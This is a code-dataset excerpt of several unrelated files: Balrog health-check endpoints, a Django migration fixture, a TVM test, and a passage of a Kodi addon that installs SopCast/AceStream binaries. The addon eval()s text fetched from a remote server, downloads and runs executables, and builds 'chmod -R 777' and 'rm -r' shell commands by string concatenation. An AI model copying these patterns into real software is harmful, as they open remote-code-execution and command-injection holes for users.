code stringlengths 1 25.8M | language stringclasses 18 values | source stringclasses 4 values | repo stringclasses 78 values | path stringlengths 0 268 |
|---|---|---|---|---|
from os import path
from flask import Response, jsonify
from auslib.global_state import dbo
def _heartbeat_database_fn(dbo):
return dbo.dockerflow.incrementWatchdogValue(changed_by="dockerflow")
def heartbeat_response(heartbeat_database_fn):
"""Per the Dockerflow spec:
Respond to /__heartbeat__ with a HTTP 200 or 5xx on error. This should
depend on services like the database to also ensure they are healthy."""
try:
database_entry_value = heartbeat_database_fn(dbo)
return Response(str(database_entry_value), headers={"Cache-Control": "public, max-age=60"})
except Exception:
return Response(status=502, response="Can't connect to the database.", headers={"Cache-Control": "public, max-age=60"})
def lbheartbeat_response():
"""Per the Dockerflow spec:
Respond to /__lbheartbeat__ with an HTTP 200. This is for load balancer
checks and should not check any dependent services."""
return Response("OK!", headers={"Cache-Control": "no-cache"})
def get_version(version_file):
if version_file and path.exists(version_file):
with open(version_file) as f:
version_json = f.read()
return Response(version_json, mimetype="application/json", headers={"Cache-Control": "no-cache"})
else:
return jsonify({"source": "https://github.com/mozilla/balrog", "version": "unknown", "commit": "unknown"})
# Keeping flask dockerflow endpoints here to maintain the admin api compatibility.
def create_dockerflow_endpoints(app, heartbeat_database_fn=_heartbeat_database_fn):
""" Wrapper that creates the endpoints required by CloudOps' Dockerflow spec:
https://github.com/mozilla-services/Dockerflow. This gets used by both the admin and public apps.
:param heartbeat_database_fn: Function that calls the database when reponding to /__heartbeat__.
A database object is passed to this function.
If heartbeat_database_fn is None, a default function is be set. The default function writes in a
dummy table. Even though we respond to GET, we do insert/update something in the database. This
allows us to see if the connection to the database exists, is active, and if the credentials given
are the correct ones. For more context see bug 1289178.
"""
@app.route("/__heartbeat__")
def heartbeat():
return heartbeat_response(heartbeat_database_fn)
@app.route("/__lbheartbeat__")
def lbheartbeat():
return lbheartbeat_response()
@app.route("/__version__")
def version():
version_file = app.config.get("VERSION_FILE")
return get_version(version_file) | unknown | codeparrot/codeparrot-clean | ||
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("lookuperror_a", "0001_initial"),
]
operations = [
migrations.CreateModel(
name="A2",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
primary_key=True,
serialize=False,
auto_created=True,
),
),
],
),
] | python | github | https://github.com/django/django | tests/migrations/migrations_test_apps/lookuperror_a/migrations/0002_a2.py |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Test code for L2 normalization"""
import numpy as np
import tvm
import topi
from topi.util import get_const_tuple
import topi.testing
def verify_l2_normalize(ishape, eps, axis=None):
A = tvm.placeholder(ishape, name='A')
B = topi.nn.l2_normalize(A, eps, axis)
dtype = A.dtype
a_np = np.random.uniform(size=ishape).astype(dtype)
b_np = topi.testing.l2_normalize_python(a_np, eps, axis)
def check_device(device):
ctx = tvm.context(device, 0)
if not ctx.exist:
print("Skip because %s is not enabled" % device)
return
print("Running on target: %s" % device)
with tvm.target.create(device):
if device == 'llvm':
s = topi.generic.schedule_l2_normalize([B])
else:
s = topi.cuda.schedule_l2_normalize([B])
a = tvm.nd.array(a_np, ctx)
b = tvm.nd.array(np.zeros(get_const_tuple(B.shape), dtype=dtype), ctx)
f = tvm.build(s, [A, B], device)
f(a, b)
tvm.testing.assert_allclose(b.asnumpy(), b_np, rtol=1e-5)
for device in ['llvm', 'cuda', 'opencl', 'metal', 'rocm', 'vulkan', 'nvptx']:
check_device(device)
def test_l2_normalize():
verify_l2_normalize((1, 3, 20, 20), 0.001)
verify_l2_normalize((1, 3, 20, 20), 0.001, (1,))
verify_l2_normalize((1, 3, 20, 20), 0.001, (1, 2))
verify_l2_normalize((1, 3, 20, 20), 0.001, (2, 3))
verify_l2_normalize((1, 3, 20, 20), 0.001, (0, 3))
verify_l2_normalize((1, 3, 20, 20), 0.001, (0, 2, 3))
if __name__ == "__main__":
test_l2_normalize() | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
""" Plexus (c) 2015 enen92
This file contains a single function. It's a function that will run on the addon first boot to download and configure the system for acestream/sopcast. The platform will be automatically detected and the necessary files downloaded and extracted to the userdata.
This function will run if and only the setting "Download modules" on boot is enabled.
Functions:
check_for_updates() -> Look for module updates between versions, force download them
firstconf() -> Configuration function, detects the platform, saves to settings, run configure sopcast/acestream functions
configure_sopcast() -> Configure Sopcast
configure_acestream() -> Configure Acestream
"""
import xbmc
import xbmcgui
import xbmcplugin
import xbmcvfs
import tarfile
import os
import re
import sys
import subprocess
import shutil
from plexusutils.pluginxbmc import *
from plexusutils.webutils import download_tools,get_page_source
from plexusutils.utilities import *
""" Platform dependent files downloaded during the addon configuration"""
trunkfolder = "https://plexus.svn.codeplex.com/svn/trunk"
version_control = trunkfolder + "/Control/versions.info"
#Linux Arm
sopcast_raspberry = trunkfolder + "/Modules/Linux/arm/rpi2/sopcast-raspberry.tar.gz"
acestream_rpi2 = trunkfolder + "/Modules/Linux/arm/rpi2/acestream-rpi2.tar.gz"
#Linux i386 and x86_64 (including openelec)
sopcast_linux_generico = trunkfolder + "/Modules/Linux/Sopcastx86_64i386/sopcast_linux.tar.gz"
openelecx86_64_sopcast = trunkfolder + "/Modules/Linux/x86_64/Openelec/sopcast_openelec64.tar.gz"
openeelcx86_64_acestream = trunkfolder + "/Modules/Linux/x86_64/Openelec/acestream_openelec64_3051.tar.gz"
openelecxi386_sopcast = trunkfolder + "/Modules/Linux/i386/openelec/sopcast_openeleci386.tar.gz"
openeelcxi386_acestream = trunkfolder + "/Modules/Linux/i386/openelec/acestream_openeleci386_303fix.tar.gz"
#gen linux
acestream_linux_x64_generic = trunkfolder + "/Modules/Linux/x86_64/acestream-linux-x86_64_3051.tar.gz"
acestream_linux_i386_generic = trunkfolder + "/Modules/Linux/i386/acestream-linux-i386_303.tar.gz"
#Android
sopcast_apk = trunkfolder + "/Modules/Android/SopCast.apk.tar.gz"
acestreamengine_apk_arm = trunkfolder + "/Modules/Android/AceStream-3.0.6-2in1.apk.tar.gz"
acestreamengine_apk_x86 = trunkfolder + "/Modules/Android/AceStream-3.0.6-2in1.apk.tar.gz"
android_aceengine_arm = trunkfolder + "/Modules/Android/org.acestream.engine-arm-3.0.6.tar.gz"
android_aceengine_x86 = trunkfolder + "/Modules/Android/org.acestream.engine_x86.tar.gz"
android_aceplayer_arm = trunkfolder + "/Modules/Android/AcePlayer-3.0.6-2in1.apk.tar.gz"
android_aceplayer_x86 = trunkfolder + "/Modules/Android/AcePlayer-3.0.6-2in1.apk.tar.gz"
#Mac OSX #TODO
osx_i386_sopcast = trunkfolder + "/Modules/MacOsx/i386/sopcast_osxi386.tar.gz"
osx_i386_acestream = trunkfolder + "/Modules/MacOsx/AceStreamWineOSX.zip"
osx_x64_sopcast = trunkfolder + "/Modules/MacOsx/x86_64/sopcast_osx64.tar.gz"
osx_x64_acestream = trunkfolder + "/Modules/MacOsx/AceStreamWineOSX.zip"
#Windows Files
acestream_windows = trunkfolder + "/Modules/Windows/acewindows-aceengine3.0.4.tar.gz"
srvany_executable = trunkfolder + "/Modules/Windows/srvany.tar.gz"
srvany_permissions = trunkfolder + "/Modules/Windows/sopcastp2p-permissions.txt"
def check_for_updates():
try:
version_source = get_page_source(version_control)
except: version_source = ""
if version_source:
version_source = eval(version_source)
if xbmc.getCondVisibility('system.platform.linux') and not xbmc.getCondVisibility('system.platform.Android'):
if "arm" in os.uname()[4]:
if settings.getSetting('rpi2') == "true": platf = "rpi2"
elif os.uname()[4] == "i386" or os.uname()[4] == "i686":
if settings.getSetting('openeleci386') == "true": platf = "openeleci386"
else: platf = "linuxi386"
elif os.uname()[4] == "x86_64":
if settings.getSetting('openelecx86_64') == "true": platf = "openelecx64"
else: platf = "linux_x86_64"
elif xbmc.getCondVisibility('system.platform.windows'): platf = "windows"
elif xbmc.getCondVisibility('system.platform.Android'): platf = "android"
elif xbmc.getCondVisibility('System.Platform.OSX'):
if os.uname()[4] == "i386" or os.uname()[4] == "i686": platf = "osx32"
elif os.uname()[4] == "x86_64": platf = "osx64"
try:
if version_source["sopcast"][platf] != settings.getSetting('sopcast_version'): configure_sopcast(version_source["sopcast"][platf])
sopcast_update = True
except: sopcast_update = False
try:
if version_source["acestream"][platf] != settings.getSetting('acestream_version'): configure_acestream(version_source["acestream"][platf])
acestream_update = True
except: acestream_update = False
if acestream_update and sopcast_update: settings.setSetting('last_version_check',value=versao)
return
def first_conf():
settings.setSetting('last_version_check',value='')
settings.setSetting('sopcast_version',value='')
settings.setSetting('acestream_version',value='')
if xbmc.getCondVisibility('system.platform.linux') and not xbmc.getCondVisibility('system.platform.Android'):
if "arm" in os.uname()[4]:
mensagemok(translate(30000),translate(30128),translate(30129))
OS_list = ["Raspberry PI 2"]
choose=xbmcgui.Dialog().select(translate(30130),OS_list)
if choose > -1:
OS_Choose= OS_list[choose]
if OS_Choose.lower() == "raspberry pi 2":
settings.setSetting('rpi2',value='true')
check_for_updates()
else:
#32bit and 64bit
if os.uname()[4] == "x86_64":
if re.search(os.uname()[1],"openelec",re.IGNORECASE):
settings.setSetting('openelecx86_64',value='true')
else:
opcao= xbmcgui.Dialog().yesno(translate(30000), translate(30074))
if opcao:
settings.setSetting('openelecx86_64',value='true')
elif os.uname()[4] == "i386" or os.uname()[4] == "i686":
if re.search(os.uname()[1],"openelec",re.IGNORECASE):
settings.setSetting('openeleci386',value='true')
else:
opcao= xbmcgui.Dialog().yesno(translate(30000), translate(30075))
if opcao:
settings.setSetting('openeleci386',value='true')
check_for_updates()
elif xbmc.getCondVisibility('system.platform.windows'):
check_for_updates()
elif xbmc.getCondVisibility('system.platform.Android'):
check_for_updates()
elif xbmc.getCondVisibility('System.Platform.OSX'):
mensagemok(translate(30000),"Not available for OSX for now")
sys.exit(0)
#check_for_updates()
settings.setSetting('autoconfig',value="false")
def configure_sopcast(latest_version):
#Configuration for LINUX
if xbmc.getCondVisibility('system.platform.linux') and not xbmc.getCondVisibility('system.platform.Android'):
print("Detected OS: Linux")
#Linux Armv
if "arm" in os.uname()[4]:
print("Sopcast Configuration - LINUX ARM")
if settings.getSetting('rpi2') == "true":
print("Raspberry PI 2")
SPSC_KIT = os.path.join(addonpath,sopcast_raspberry.split("/")[-1])
download_tools().Downloader(sopcast_raspberry,SPSC_KIT,translate(30076),translate(30000))
if tarfile.is_tarfile(SPSC_KIT):
path_libraries = os.path.join(pastaperfil,"sopcast")
download_tools().extract(SPSC_KIT,path_libraries)
xbmc.sleep(500)
download_tools().remove(SPSC_KIT)
if latest_version: settings.setSetting('sopcast_version',value=latest_version)
return
elif os.uname()[4] == "x86_64":
generic = False
if settings.getSetting('openelecx86_64') == "true":
print("Detected OpenELEC x86_64")
SPSC_KIT = os.path.join(addonpath,openelecx86_64_sopcast.split("/")[-1])
download_tools().Downloader(openelecx86_64_sopcast,SPSC_KIT,translate(30076),translate(30000))
if tarfile.is_tarfile(SPSC_KIT):
download_tools().extract(SPSC_KIT,pastaperfil)
xbmc.sleep(500)
download_tools().remove(SPSC_KIT)
if latest_version: settings.setSetting('sopcast_version',value=latest_version)
return
else: generic = True
elif os.uname()[4] == "i386" or os.uname()[4] == "i686":
generic = False
if settings.getSetting('openeleci386') == "true":
SPSC_KIT = os.path.join(addonpath,openelecxi386_sopcast.split("/")[-1])
download_tools().Downloader(openelecxi386_sopcast,SPSC_KIT,translate(30076),translate(30000))
if tarfile.is_tarfile(SPSC_KIT):
download_tools().extract(SPSC_KIT,pastaperfil)
xbmc.sleep(500)
download_tools().remove(SPSC_KIT)
if latest_version: settings.setSetting('sopcast_version',value=latest_version)
return
else: generic = True
if generic == True:
SPSC_KIT = os.path.join(addonpath,sopcast_linux_generico.split("/")[-1])
download_tools().Downloader(sopcast_linux_generico,SPSC_KIT,translate(30076),translate(30000))
if tarfile.is_tarfile(SPSC_KIT):
path_libraries = os.path.join(pastaperfil,"sopcast")
download_tools().extract(SPSC_KIT,path_libraries)
xbmc.sleep(500)
download_tools().remove(SPSC_KIT)
#set every single file from the bundle as executable
path_libraries = os.path.join(pastaperfil,"sopcast")
dirs, files = xbmcvfs.listdir(path_libraries)
for ficheiro in files:
binary_path = os.path.join(path_libraries,ficheiro)
st = os.stat(binary_path)
import stat
os.chmod(binary_path, st.st_mode | stat.S_IEXEC)
path_libraries = os.path.join(path_libraries,"lib")
dirs, files = xbmcvfs.listdir(path_libraries)
for ficheiro in files:
binary_path = os.path.join(path_libraries,ficheiro)
st = os.stat(binary_path)
import stat
os.chmod(binary_path, st.st_mode | stat.S_IEXEC)
if latest_version: settings.setSetting('sopcast_version',value=latest_version)
return
elif xbmc.getCondVisibility('system.platform.windows'):
print("Detected OS: Windows")
if not xbmcvfs.exists(pastaperfil): xbmcvfs.mkdir(pastaperfil)
#Sop
import ctypes
is_admin=ctypes.windll.shell32.IsUserAnAdmin() != 0
if is_admin == False:
mensagemok(translate(30000),translate(30077),translate(30078))
else:
cmd = ['sc','delete','sopcastp2p']
proc = subprocess.Popen(cmd,stdout=subprocess.PIPE,shell=True)
for line in proc.stdout:
print("cmd out: " + line.rstrip())
xbmc.sleep(1000)
ret = mensagemprogresso.create(translate(30000),translate(30000))
mensagemprogresso.update(0,translate(30117)," ")
xbmc.sleep(1000)
import _winreg
aReg = _winreg.ConnectRegistry(None,_winreg.HKEY_LOCAL_MACHINE)
try:
aKey = _winreg.OpenKey(aReg, r'SOFTWARE\SopCast\Player\InstallPath',0, _winreg.KEY_READ)
name, value, type = _winreg.EnumValue(aKey, 0)
sopcast_executable = value
print("Installation executable of sopcast was found: " + sopcast_executable)
_winreg.CloseKey(aKey)
mensagemprogresso.update(10,translate(30079),translate(30080))
except:
sopcast_executable = ""
mensagemok(translate(30000),translate(30081),translate(30082))
if not sopcast_executable: pass
else:
xbmc.sleep(1000)
mensagemprogresso.update(20,translate(30083)," ")
xbmc.sleep(1000)
print ("Getting windows users IDS")
aReg = _winreg.ConnectRegistry(None,_winreg.HKEY_LOCAL_MACHINE)
aKey = _winreg.OpenKey(aReg, r'SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList')
users = []
for i in range(1024):
try:
asubkey=_winreg.EnumKey(aKey,i)
print(asubkey)
aKeydois = _winreg.OpenKey(aReg, os.path.join('SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList',asubkey))
val=_winreg.QueryValueEx(aKeydois, "ProfileImagePath")
try:
print(val[0])
except:
print("Notice: User with strange characters, print cmd ignored.")
if "Windows" in val[0] or "%systemroot%" in val[0]:
pass
else:
users.append(asubkey)
except:
pass
if not users:
mensagemok(translate(30000),translate(30084))
else:
mensagemprogresso.update(30,translate(30085),translate(30080))
xbmc.sleep(200)
mensagemprogresso.update(30,translate(30086)," ")
xbmc.sleep(1000)
print("System Users", users)
srvany_final_location = os.path.join(sopcast_executable.replace("SopCast.exe",""),"srvany.exe")
srvany_download_location = os.path.join(addonpath,"srvany.exe")
srvanytgz_download_location = os.path.join(addonpath,"srvany.tar.gz")
download_tools().Downloader(srvany_executable,srvanytgz_download_location,translate(30087),translate(30000))
xbmc.sleep(1000)
if tarfile.is_tarfile(srvanytgz_download_location):
path_libraries = addonpath
download_tools().extract(srvanytgz_download_location,path_libraries)
xbmcvfs.copy(srvany_download_location,srvany_final_location)
download_tools().remove(srvanytgz_download_location)
download_tools().remove(srvany_download_location)
xbmc.sleep(1000)
ret = mensagemprogresso.create(translate(30000),translate(30000))
xbmc.sleep(200)
mensagemprogresso.update(35,translate(30088)," ")
xbmc.sleep(1000)
cmd = ['sc','create','sopcastp2p','binpath=',os.path.join(os.path.join(sopcast_executable.replace("SopCast.exe","")),'srvany.exe')]
proc = subprocess.Popen(cmd,stdout=subprocess.PIPE,shell=True)
servicecreator = False
for line in proc.stdout:
print ("cmd out: " + line.rstrip())
servicecreator = True
if servicecreator == False:
mensagemok(translate(30000),translate(30089))
else:
mensagemprogresso.update(40,translate(30088),translate(30080))
xbmc.sleep(1000)
mensagemprogresso.update(45,translate(30090)," ")
xbmc.sleep(1000)
print("Trying to modify regedit....")
try:
aReg = _winreg.ConnectRegistry(None,_winreg.HKEY_LOCAL_MACHINE)
key = _winreg.CreateKey(aReg, r'SYSTEM\CurrentControlSet\Services\sopcastp2p\Parameters')
_winreg.SetValueEx(key, 'AppDirectory', 0, _winreg.REG_SZ, os.path.join(sopcast_executable.replace("SopCast.exe","")))
_winreg.SetValueEx(key, 'Application', 0, _winreg.REG_SZ, os.path.join(os.path.join(sopcast_executable.replace("SopCast.exe","")),"SopCast.exe"))
_winreg.SetValueEx(key, 'AppParameters', 0, _winreg.REG_SZ, "sop://")
mensagemprogresso.update(50,translate(30090), translate(30080))
regedit = True
except:
mensagemok(translate(30000),translate(30091))
regedit = False
if regedit == False: pass
else:
xbmc.sleep(1000)
mensagemprogresso.update(50,translate(30092), " ")
cmd = ['sc','sdshow','sopcastp2p']
proc = subprocess.Popen(cmd,stdout=subprocess.PIPE,shell=True)
lines = []
for line in proc.stdout:
print(line.rstrip())
if line.rstrip() != "" and "(" in line.rstrip(): lines.append(line.rstrip())
else: pass
if len(lines) != 1: mensagemok(translate(30000),translate(30093))
else:
linha_arr = []
for user in users:
linha_arr.append('(A;;RPWPCR;;;' + user + ')')
linha_add = ''
for linha in linha_arr:
linha_add += linha
print("line piece to add: " + linha_add)
linha_final = lines[0].replace("S:(",linha_add + "S:(")
print("Final line: " + linha_final)
permissions = False
xbmc.sleep(500)
mensagemprogresso.update(60,translate(30092), translate(30080))
xbmc.sleep(500)
mensagemprogresso.update(60,translate(30094), " ")
cmd = ['sc','sdset','sopcastp2p',linha_final]
proc = subprocess.Popen(cmd,stdout=subprocess.PIPE,shell=True)
for line in proc.stdout:
print(line.rstrip())
permissions = True
if permissions == False: mensagemok(translate(30000),translate(30095))
else:
mensagemprogresso.update(70,translate(30094), translate(30080))
xbmc.sleep(1000)
mensagemprogresso.update(70,translate(30096), " ")
print("Trying to set sopcastp2p service regedit permissions...")
download_tools().Downloader(srvany_permissions,os.path.join(pastaperfil,"sopcastp2p-permissions.txt"),translate(30097),translate(30000))
xbmc.sleep(500)
ret = mensagemprogresso.create(translate(30000),translate(30000))
xbmc.sleep(500)
mensagemprogresso.update(80,translate(30098), " ")
xbmc.sleep(1000)
cmd = ['regini',os.path.join(pastaperfil,"sopcastp2p-permissions.txt")]
proc = subprocess.Popen(cmd,stdout=subprocess.PIPE,shell=True)
for line in proc.stdout:
print(line.rstrip())
mensagemprogresso.update(90,translate(30098), translate(30098))
mensagemprogresso.update(100,translate(30099), " ")
xbmc.sleep(2000)
mensagemprogresso.close()
if latest_version: settings.setSetting('sopcast_version',value=latest_version)
return
elif xbmc.getCondVisibility('System.Platform.OSX'):
print("Detected OS: Mac OSX")
available = False
if os.uname()[-1] == "x86_64":
mac_package = osx_x64_sopcast
available = True
elif os.uname()[-1] == "i386":
mac_package = osx_i386_sopcast
available = True
else:
available = False
if available == True:
if not os.path.exists(pastaperfil):
xbmcvfs.mkdir(pastaperfil)
MAC_KIT = os.path.join(addonpath,mac_package.split("/")[-1])
download_tools().Downloader(mac_package,MAC_KIT,translate(30076),translate(30000))
if tarfile.is_tarfile(MAC_KIT):
path_libraries = os.path.join(pastaperfil)
download_tools().extract(MAC_KIT,pastaperfil)
download_tools().remove(MAC_KIT)
sp_sc_auth = os.path.join(pastaperfil,"sopcast","sp-sc-auth")
st = os.stat(sp_sc_auth)
import stat
os.chmod(sp_sc_auth, st.st_mode | stat.S_IEXEC)
if latest_version: settings.setSetting('sopcast_version',value=latest_version)
return
else:
mensagemok(translate(30000),translate(30100))
return
elif xbmc.getCondVisibility('System.Platform.Android'):
print("Detected OS: Android")
#Sopcast configuration
print("Starting SopCast Configuration")
#Moving sopclient to ext4 hack - tks steeve from xbmctorrent
sopclient_builtin_location = os.path.join(addonpath,"resources","binaries","sopclient")
#Hack to get current xbmc app id
xbmcfolder=xbmc.translatePath(addonpath).split("/")
found = False
if settings.getSetting('auto_appid') == 'true':
i = 0
sopcast_installed = False
for folder in xbmcfolder:
if folder.count('.') >= 2 and folder != addon_id :
found = True
break
else:
i+=1
if found == True:
uid = os.getuid()
app_id = xbmcfolder[i]
else:
if settings.getSetting('custom_appid') != '':
uid = os.getuid()
app_id = settings.getSetting('custom_appid')
found = True
if found == True:
xbmc_data_path = os.path.join("/data", "data", app_id)
if os.path.exists(xbmc_data_path) and uid == os.stat(xbmc_data_path).st_uid:
android_binary_dir = os.path.join(xbmc_data_path, "files", "program.plexus")
if not os.path.exists(android_binary_dir):
os.makedirs(android_binary_dir)
android_binary_path = os.path.join(android_binary_dir, "sopclient")
if not os.path.exists(android_binary_path) or os.path.getsize(android_binary_path) != os.path.getsize(sopclient_builtin_location):
shutil.copy2(sopclient_builtin_location, android_binary_path)
binary_path = android_binary_path
st = os.stat(binary_path)
import stat
os.chmod(binary_path, st.st_mode | stat.S_IEXEC)
settings.setSetting('android_sopclient',value=binary_path)
opcao= xbmcgui.Dialog().yesno(translate(30000), translate(30101),translate(30103))
if not opcao:
settings.setSetting('external-sopcast',value='1')
sopcast_installed = True
mensagemok(translate(30000),translate(30099))
else:
mensagemok(translate(30000),translate(30104))
if os.path.exists(os.path.join("sdcard","Download")):
pasta = os.path.join("sdcard","Download")
sopfile = os.path.join("sdcard","Download",sopcast_apk.split("/")[-1])
else:
dialog = xbmcgui.Dialog()
pasta = dialog.browse(int(0), translate(30105), 'videos')
sopfile = os.path.join(pasta,sopcast_apk.split("/")[-1])
download_tools().Downloader(sopcast_apk,sopfile,translate(30106),translate(30000))
if tarfile.is_tarfile(sopfile):
download_tools().extract(sopfile,pasta)
download_tools().remove(sopfile)
mensagemok(translate(30000),translate(30107),pasta,translate(30108))
sopcast_installed = True
settings.setSetting('external-sopcast',value='0')
mensagemok(translate(30000),translate(30099))
if latest_version: settings.setSetting('sopcast_version',value=latest_version)
return
else:
mensagemok(translate(30000),translate(30109))
return
def configure_acestream(latest_version):
#Configuration for LINUX
if xbmc.getCondVisibility('system.platform.linux') and not xbmc.getCondVisibility('system.platform.Android'):
print("Detected OS: Linux")
if "arm" in os.uname()[4]:
print("Linux Arm")
if settings.getSetting('rpi2') == "true":
ACE_KIT = os.path.join(addonpath,acestream_rpi2.split("/")[-1])
download_tools().Downloader(acestream_rpi2,ACE_KIT,translate(30110),translate(30000))
if tarfile.is_tarfile(ACE_KIT):
path_libraries = os.path.join(pastaperfil)
download_tools().extract(ACE_KIT,path_libraries)
xbmc.sleep(500)
download_tools().remove(ACE_KIT)
#set chroot to executable
binary_path = os.path.join(pastaperfil,"acestream","chroot")
st = os.stat(binary_path)
import stat
os.chmod(binary_path, st.st_mode | stat.S_IEXEC)
if latest_version: settings.setSetting('acestream_version',value=latest_version)
return
elif os.uname()[4] == "x86_64":
if settings.getSetting('openelecx86_64') == "true":
print("OpenELEC x86_64 Acestream configuration")
ACE_KIT = os.path.join(addonpath,openeelcx86_64_acestream.split("/")[-1])
download_tools().Downloader(openeelcx86_64_acestream ,ACE_KIT,translate(30110),translate(30000))
if tarfile.is_tarfile(ACE_KIT):
download_tools().extract(ACE_KIT,pastaperfil)
xbmc.sleep(500)
download_tools().remove(ACE_KIT)
if latest_version: settings.setSetting('acestream_version',value=latest_version)
return
else:
print("64 bit Linux Disto Acestream Configuration")
ACE_KIT = os.path.join(addonpath,acestream_linux_x64_generic.split("/")[-1])
download_tools().Downloader(acestream_linux_x64_generic,ACE_KIT,translate(30110),translate(30000))
if tarfile.is_tarfile(ACE_KIT):
download_tools().extract(ACE_KIT,pastaperfil)
xbmc.sleep(500)
download_tools().remove(ACE_KIT)
if latest_version: settings.setSetting('acestream_version',value=latest_version)
return
elif os.uname()[4] == "i386" or os.uname()[4] == "i686":
if settings.getSetting('openeleci386') == "true":
print("32 bit Openelec Acestream Configuration")
ACE_KIT = os.path.join(addonpath,openeelcxi386_acestream.split("/")[-1])
download_tools().Downloader(openeelcxi386_acestream,ACE_KIT,translate(30110),translate(30000))
if tarfile.is_tarfile(ACE_KIT):
download_tools().extract(ACE_KIT,pastaperfil)
xbmc.sleep(500)
download_tools().remove(ACE_KIT)
if latest_version: settings.setSetting('acestream_version',value=latest_version)
return
else:
print("32 bit Linux general distro Acestream Configuration")
ACE_KIT = os.path.join(addonpath,acestream_linux_i386_generic.split("/")[-1])
download_tools().Downloader(acestream_linux_i386_generic,ACE_KIT,translate(30110),translate(30000))
if tarfile.is_tarfile(ACE_KIT):
download_tools().extract(ACE_KIT,pastaperfil)
xbmc.sleep(500)
download_tools().remove(ACE_KIT)
if latest_version: settings.setSetting('acestream_version',value=latest_version)
return
elif xbmc.getCondVisibility('system.platform.windows'):
print("Detected OS: Windows")
if not os.path.exists(pastaperfil): xbmcvfs.mkdir(pastaperfil)
#Ace
SPSC_KIT = os.path.join(addonpath,acestream_windows.split("/")[-1])
download_tools().Downloader(acestream_windows,SPSC_KIT,translate(30110),translate(30000))
if os.path.exists(os.path.join(pastaperfil,"acestream")):
shutil.rmtree(os.path.join(pastaperfil,"acestream"))
if os.path.exists(os.path.join(pastaperfil,"player")):
shutil.rmtree(os.path.join(pastaperfil,"player"))
if tarfile.is_tarfile(SPSC_KIT):
path_libraries = os.path.join(pastaperfil)
download_tools().extract(SPSC_KIT,path_libraries)
download_tools().remove(SPSC_KIT)
if latest_version: settings.setSetting('acestream_version',value=latest_version)
return
elif xbmc.getCondVisibility('System.Platform.OSX'):
print("Detected OS: Mac OSX")
available = False
if os.uname()[-1] == "x86_64":
mac_package = osx_x64_acestream
available = True
elif os.uname()[-1] == "i386":
mac_package = osx_i386_acestream
available = True
else:
available = False
if available == True:
MAC_KIT = os.path.join('/Applications',mac_package.split("/")[-1])
if not xbmcvfs.exists(os.path.join('/Applications','Ace Stream.app')):
download_tools().Downloader(mac_package,MAC_KIT,translate(30110),translate(30000))
if xbmcvfs.exists(MAC_KIT):
xbmc.sleep(1000)
cmd = 'unzip /Applications/AceStreamWineOSX.zip'
zipa = subprocess.Popen(cmd,shell=True)
cmd = 'chmod -R 755 /Applications/Ace\ Stream.app'
print cmd
chmod = subprocess.Popen(cmd,shell=True)
try: os.remove(MAC_KIT)
except: pass
if latest_version: settings.setSetting('acestream_version',value=latest_version)
return
else:
mensagemok(translate(30000),translate(30100))
return
elif xbmc.getCondVisibility('System.Platform.Android'):
print("Detected OS: Android")
print("Starting Acestream Configuration")
#acestream config for android
if not os.path.exists(pastaperfil): xbmcvfs.mkdir(pastaperfil)
#Hack to get xbmc app id
xbmcfolder=xbmc.translatePath(addonpath).split("/")
found = False
if settings.getSetting('auto_appid') == 'true':
i = 0
sopcast_installed = False
for folder in xbmcfolder:
if folder.count('.') >= 2 and folder != addon_id :
found = True
break
else:
i+=1
if found == True:
uid = os.getuid()
app_id = xbmcfolder[i]
else:
if settings.getSetting('custom_appid') != '':
uid = os.getuid()
app_id = settings.getSetting('custom_appid')
found = True
if found == True:
settings.setSetting('app_id',app_id)
#Acestreamconfiguration for android starts here
if "arm" in os.uname()[4]:
acebundle = os.path.join(pastaperfil,android_aceengine_arm.split("/")[-1])
download_tools().Downloader(android_aceengine_arm,acebundle,translate(30111),translate(30000))
else:
acebundle = os.path.join(pastaperfil,android_aceengine_x86.split("/")[-1])
download_tools().Downloader(android_aceengine_x86,acebundle,translate(30111),translate(30000))
if tarfile.is_tarfile(acebundle):
download_tools().extract(acebundle,pastaperfil)
download_tools().remove(acebundle)
orgacestreamenginefolder = os.path.join(pastaperfil,"org.acestream.engine")
xbmc_data_path = os.path.join("/data", "data", app_id)
if os.path.exists(xbmc_data_path) and uid == os.stat(xbmc_data_path).st_uid:
android_binary_dir = os.path.join(xbmc_data_path, "files", "program.plexus")
if not os.path.exists(android_binary_dir): os.makedirs(android_binary_dir)
android_acestream_folder = os.path.join(android_binary_dir,"org.acestream.engine")
if not os.path.exists(android_acestream_folder): os.makedirs(android_acestream_folder)
else:
#clean install for android - delete old folder
print android_acestream_folder
try:
os.system("chmod -R 777 "+android_acestream_folder+"/*")
os.system("rm -r '"+android_acestream_folder+"'")
except: pass
try: os.makedirs(android_acestream_folder)
except: pass
xbmc.sleep(200)
#clean install in android - remove /sdcard/.ACEStream folder if it exists (to be enabled between versions if we need to remove older settings
#if os.path.exists(os.path.join('/sdcard','.ACEStream')):
# try:
# hidden_ace = os.path.join('/sdcard','.ACEStream')
# os.system("chmod -R 777 "+hidden_ace+"/*")
# os.system("rm -r '"+hidden_ace+"'")
# except: pass
recursive_overwrite(orgacestreamenginefolder, android_acestream_folder, ignore=None)
pythonbin = os.path.join(android_acestream_folder,"files","python","bin","python")
st = os.stat(pythonbin)
import stat
os.chmod(pythonbin, st.st_mode | stat.S_IEXEC)
if os.path.exists(orgacestreamenginefolder):
try:
os.system("chmod -R 777 "+orgacestreamenginefolder+"/*")
os.system("rm -r '"+orgacestreamenginefolder+"'")
except: pass
try: xbmcvfs.mkdir(os.path.join('/sdcard','org.acestream.engine'))
except: pass
opcao= xbmcgui.Dialog().yesno(translate(30000), translate(30112),translate(30113))
if not opcao:
settings.setSetting('engine_app','0')
else:
mensagemok(translate(30000),translate(30114),translate(30115),translate(30116))
if os.path.exists(os.path.join("sdcard","Download")):
pasta = os.path.join("sdcard","Download")
